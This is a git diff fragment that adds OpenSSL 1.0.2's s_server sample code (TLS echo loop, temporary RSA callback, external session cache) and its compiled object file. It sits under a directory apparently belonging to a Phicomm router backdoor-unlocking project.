+    char *buf = NULL;
+    int i;
+    int ret = 1;
+    SSL *con;
+    BIO *io, *ssl_bio, *sbio;
+#ifndef OPENSSL_NO_KRB5
+    KSSL_CTX *kctx;
+#endif
+
+    buf = OPENSSL_malloc(bufsize);
+    if (buf == NULL)
+        return (0);
+    io = BIO_new(BIO_f_buffer());
+    ssl_bio = BIO_new(BIO_f_ssl());
+    if ((io == NULL) || (ssl_bio == NULL))
+        goto err;
+
+    /* lets make the output buffer a reasonable size */
+    if (!BIO_set_write_buffer_size(io, bufsize))
+        goto err;
+
+    if ((con = SSL_new(ctx)) == NULL)
+        goto err;
+#ifndef OPENSSL_NO_TLSEXT
+    if (s_tlsextdebug) {
+        SSL_set_tlsext_debug_callback(con, tlsext_cb);
+        SSL_set_tlsext_debug_arg(con, bio_s_out);
+    }
+#endif
+#ifndef OPENSSL_NO_KRB5
+    if ((kctx = kssl_ctx_new()) != NULL) {
+        kssl_ctx_setstring(kctx, KSSL_SERVICE, KRB5SVC);
+        kssl_ctx_setstring(kctx, KSSL_KEYTAB, KRB5KEYTAB);
+    }
+#endif                          /* OPENSSL_NO_KRB5 */
+    if (context)
+        SSL_set_session_id_context(con, context, strlen((char *)context));
+
+    sbio = BIO_new_socket(s, BIO_NOCLOSE);
+    SSL_set_bio(con, sbio, sbio);
+    SSL_set_accept_state(con);
+
+    BIO_set_ssl(ssl_bio, con, BIO_CLOSE);
+    BIO_push(io, ssl_bio);
+#ifdef CHARSET_EBCDIC
+    io = BIO_push(BIO_new(BIO_f_ebcdic_filter()), io);
+#endif
+
+    if (s_debug) {
+        SSL_set_debug(con, 1);
+        BIO_set_callback(SSL_get_rbio(con), bio_dump_callback);
+        BIO_set_callback_arg(SSL_get_rbio(con), (char *)bio_s_out);
+    }
+    if (s_msg) {
+#ifndef OPENSSL_NO_SSL_TRACE
+        if (s_msg == 2)
+            SSL_set_msg_callback(con, SSL_trace);
+        else
+#endif
+            SSL_set_msg_callback(con, msg_cb);
+        SSL_set_msg_callback_arg(con, bio_s_msg ? bio_s_msg : bio_s_out);
+    }
+
+    for (;;) {
+        i = BIO_do_handshake(io);
+        if (i > 0)
+            break;
+        if (!BIO_should_retry(io)) {
+            BIO_puts(bio_err, "CONNECTION FAILURE\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+    BIO_printf(bio_err, "CONNECTION ESTABLISHED\n");
+    print_ssl_summary(bio_err, con);
+
+    for (;;) {
+        i = BIO_gets(io, buf, bufsize - 1);
+        if (i < 0) {            /* error */
+            if (!BIO_should_retry(io)) {
+                if (!s_quiet)
+                    ERR_print_errors(bio_err);
+                goto err;
+            } else {
+                BIO_printf(bio_s_out, "read R BLOCK\n");
+#if defined(OPENSSL_SYS_NETWARE)
+                delay(1000);
+#elif !defined(OPENSSL_SYS_MSDOS) && !defined(__DJGPP__)
+                sleep(1);
+#endif
+                continue;
+            }
+        } else if (i == 0) {    /* end of input */
+            ret = 1;
+            BIO_printf(bio_err, "CONNECTION CLOSED\n");
+            goto end;
+        } else {
+            char *p = buf + i - 1;
+            while (i && (*p == '\n' || *p == '\r')) {
+                p--;
+                i--;
+            }
+            if (!s_ign_eof && i == 5 && !strncmp(buf, "CLOSE", 5)) {
+                ret = 1;
+                BIO_printf(bio_err, "CONNECTION CLOSED\n");
+                goto end;
+            }
+            BUF_reverse((unsigned char *)buf, NULL, i);
+            buf[i] = '\n';
+            BIO_write(io, buf, i + 1);
+            for (;;) {
+                i = BIO_flush(io);
+                if (i > 0)
+                    break;
+                if (!BIO_should_retry(io))
+                    goto end;
+            }
+        }
+    }
+ end:
+    /* make sure we re-use sessions */
+    SSL_set_shutdown(con, SSL_SENT_SHUTDOWN | SSL_RECEIVED_SHUTDOWN);
+
+ err:
+
+    if (buf != NULL)
+        OPENSSL_free(buf);
+    if (io != NULL)
+        BIO_free_all(io);
+    return (ret);
+}
+
+#ifndef OPENSSL_NO_RSA
+static RSA MS_CALLBACK *tmp_rsa_cb(SSL *s, int is_export, int keylength)
+{
+    BIGNUM *bn = NULL;
+    static RSA *rsa_tmp = NULL;
+
+    if (!rsa_tmp && ((bn = BN_new()) == NULL))
+        BIO_printf(bio_err, "Allocation error in generating RSA key\n");
+    if (!rsa_tmp && bn) {
+        if (!s_quiet) {
+            BIO_printf(bio_err, "Generating temp (%d bit) RSA key...",
+                       keylength);
+            (void)BIO_flush(bio_err);
+        }
+        if (!BN_set_word(bn, RSA_F4) || ((rsa_tmp = RSA_new()) == NULL) ||
+            !RSA_generate_key_ex(rsa_tmp, keylength, bn, NULL)) {
+            if (rsa_tmp)
+                RSA_free(rsa_tmp);
+            rsa_tmp = NULL;
+        }
+        if (!s_quiet) {
+            BIO_printf(bio_err, "\n");
+            (void)BIO_flush(bio_err);
+        }
+        BN_free(bn);
+    }
+    return (rsa_tmp);
+}
+#endif
+
+#define MAX_SESSION_ID_ATTEMPTS 10
+static int generate_session_id(const SSL *ssl, unsigned char *id,
+                               unsigned int *id_len)
+{
+    unsigned int count = 0;
+    do {
+        RAND_pseudo_bytes(id, *id_len);
+        /*
+         * Prefix the session_id with the required prefix. NB: If our prefix
+         * is too long, clip it - but there will be worse effects anyway, eg.
+         * the server could only possibly create 1 session ID (ie. the
+         * prefix!) so all future session negotiations will fail due to
+         * conflicts.
+         */
+        memcpy(id, session_id_prefix,
+               (strlen(session_id_prefix) < *id_len) ?
+               strlen(session_id_prefix) : *id_len);
+    }
+    while (SSL_has_matching_session_id(ssl, id, *id_len) &&
+           (++count < MAX_SESSION_ID_ATTEMPTS));
+    if (count >= MAX_SESSION_ID_ATTEMPTS)
+        return 0;
+    return 1;
+}
+
+/*
+ * By default s_server uses an in-memory cache which caches SSL_SESSION
+ * structures without any serialisation. This hides some bugs which only
+ * become apparent in deployed servers. By implementing a basic external
+ * session cache some issues can be debugged using s_server.
+ */
+
+typedef struct simple_ssl_session_st {
+    unsigned char *id;
+    unsigned int idlen;
+    unsigned char *der;
+    int derlen;
+    struct simple_ssl_session_st *next;
+} simple_ssl_session;
+
+static simple_ssl_session *first = NULL;
+
+static int add_session(SSL *ssl, SSL_SESSION *session)
+{
+    simple_ssl_session *sess;
+    unsigned char *p;
+
+    sess = OPENSSL_malloc(sizeof(simple_ssl_session));
+
+    SSL_SESSION_get_id(session, &sess->idlen);
+    sess->derlen = i2d_SSL_SESSION(session, NULL);
+
+    sess->id = BUF_memdup(SSL_SESSION_get_id(session, NULL), sess->idlen);
+
+    sess->der = OPENSSL_malloc(sess->derlen);
+    p = sess->der;
+    i2d_SSL_SESSION(session, &p);
+
+    sess->next = first;
+    first = sess;
+    BIO_printf(bio_err, "New session added to external cache\n");
+    return 0;
+}
+
+static SSL_SESSION *get_session(SSL *ssl, unsigned char *id, int idlen,
+                                int *do_copy)
+{
+    simple_ssl_session *sess;
+    *do_copy = 0;
+    for (sess = first; sess; sess = sess->next) {
+        if (idlen == (int)sess->idlen && !memcmp(sess->id, id, idlen)) {
+            const unsigned char *p = sess->der;
+            BIO_printf(bio_err, "Lookup session: cache hit\n");
+            return d2i_SSL_SESSION(NULL, &p, sess->derlen);
+        }
+    }
+    BIO_printf(bio_err, "Lookup session: cache miss\n");
+    return NULL;
+}
+
+static void del_session(SSL_CTX *sctx, SSL_SESSION *session)
+{
+    simple_ssl_session *sess, *prev = NULL;
+    const unsigned char *id;
+    unsigned int idlen;
+    id = SSL_SESSION_get_id(session, &idlen);
+    for (sess = first; sess; sess = sess->next) {
+        if (idlen == sess->idlen && !memcmp(sess->id, id, idlen)) {
+            if (prev)
+                prev->next = sess->next;
+            else
+                first = sess->next;
+            OPENSSL_free(sess->id);
+            OPENSSL_free(sess->der);
+            OPENSSL_free(sess);
+            return;
+        }
+        prev = sess;
+    }
+}
+
+static void init_session_cache_ctx(SSL_CTX *sctx)
+{
+    SSL_CTX_set_session_cache_mode(sctx,
+                                   SSL_SESS_CACHE_NO_INTERNAL |
+                                   SSL_SESS_CACHE_SERVER);
+    SSL_CTX_sess_set_new_cb(sctx, add_session);
+    SSL_CTX_sess_set_get_cb(sctx, get_session);
+    SSL_CTX_sess_set_remove_cb(sctx, del_session);
+}
+
+static void free_sessions(void)
+{
+    simple_ssl_session *sess, *tsess;
+    for (sess = first; sess;) {
+        OPENSSL_free(sess->id);
+        OPENSSL_free(sess->der);
+        tsess = sess;
+        sess = sess->next;
+        OPENSSL_free(tsess);
+    }
+    first = NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_server.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_server.o
new file mode 100644
index 0000000000000000000000000000000000000000..dd56e5efd6e9f9f05e6b47627a3776d3820a1b17
GIT binary patch
literal 89216
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
